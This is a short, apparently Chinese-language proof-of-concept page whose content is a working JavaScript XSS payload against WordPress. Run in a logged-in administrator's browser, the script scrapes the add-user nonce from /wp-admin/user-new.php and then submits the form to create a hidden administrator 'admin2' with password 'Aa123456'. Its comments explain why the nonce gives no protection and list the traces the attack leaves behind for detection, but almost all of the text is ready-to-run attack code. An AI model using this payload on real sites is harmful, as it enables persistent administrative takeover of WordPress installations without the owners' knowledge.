WordPress通过XSS创建管理员
WordPress通过XSS创建管理员
XSS代码:
// Proof-of-concept payload as documented on this page: when it executes in the
// browser of a logged-in WordPress administrator (the XSS entry point), it adds
// a new administrator account. It makes two same-origin requests:
//   1. GET  /wp-admin/user-new.php  -> read the per-form nonce out of the HTML
//   2. POST /wp-admin/user-new.php  -> submit the "add user" form with that nonce
// Because both requests are same-origin, the browser attaches the victim's
// session cookies itself; no credential is ever needed by the script.
var xhr = new XMLHttpRequest()
// Step 1: fetch the add-user form to obtain the nonce.
xhr.open("GET","/wp-admin/user-new.php")
xhr.onreadystatechange = function () {
   if (xhr.readyState === 4) {
      // Scrape the value of the hidden `_wpnonce_create-user` field.
      // The nonce is WordPress's CSRF defence: it stops cross-origin forgery,
      // but it cannot help once script already runs inside the site's origin
      // and can read the page. Fixing the XSS is the actual mitigation.
      token = xhr.responseText.match('name="_wpnonce_create-user" value="(.*?)"')[1]

      	var url = "/wp-admin/user-new.php";
		var xhr2 = new XMLHttpRequest();
		// Step 2: replay the form submission with the harvested nonce.
		xhr2.open("POST", url);

		// Same encoding the real HTML form uses when submitted.
		xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

		xhr2.onreadystatechange = function () {
		   if (xhr2.readyState === 4) {
		      // Only for the author's debugging; the victim never sees this output.
		      console.log(xhr2.status);
		      console.log(xhr2.responseText);
		   }};

		// Field set of the user-new.php form: action=createuser plus the nonce and
		// referer WordPress expects, a fixed login/email/password, role=administrator,
		// pw_weak=on to bypass the weak-password confirmation, and `createuser=`
		// carrying the URL-encoded label of the submit button ("添加用户").
		// Detection angle: a POST to user-new.php with action=createuser from a
		// session that never rendered that page, and an administrator account
		// (here "admin2") that no operator created, are the artefacts this leaves.
		var data = "action=createuser&_wpnonce_create-user="+token+"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=admin2&email=admin%40gg.com&first_name=&last_name=&url=&locale=site-default&pass1=Aa123456&pass2=Aa123456&pw_weak=on&role=administrator&createuser=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7";

		xhr2.send(data);
   }};
// Kick off step 1; everything above runs asynchronously from the callbacks.
xhr.send(null)
 
先获取到token，然后请求创建管理员的接口，添加一个账号密码为(admin2/Aa123456)的管理员账户。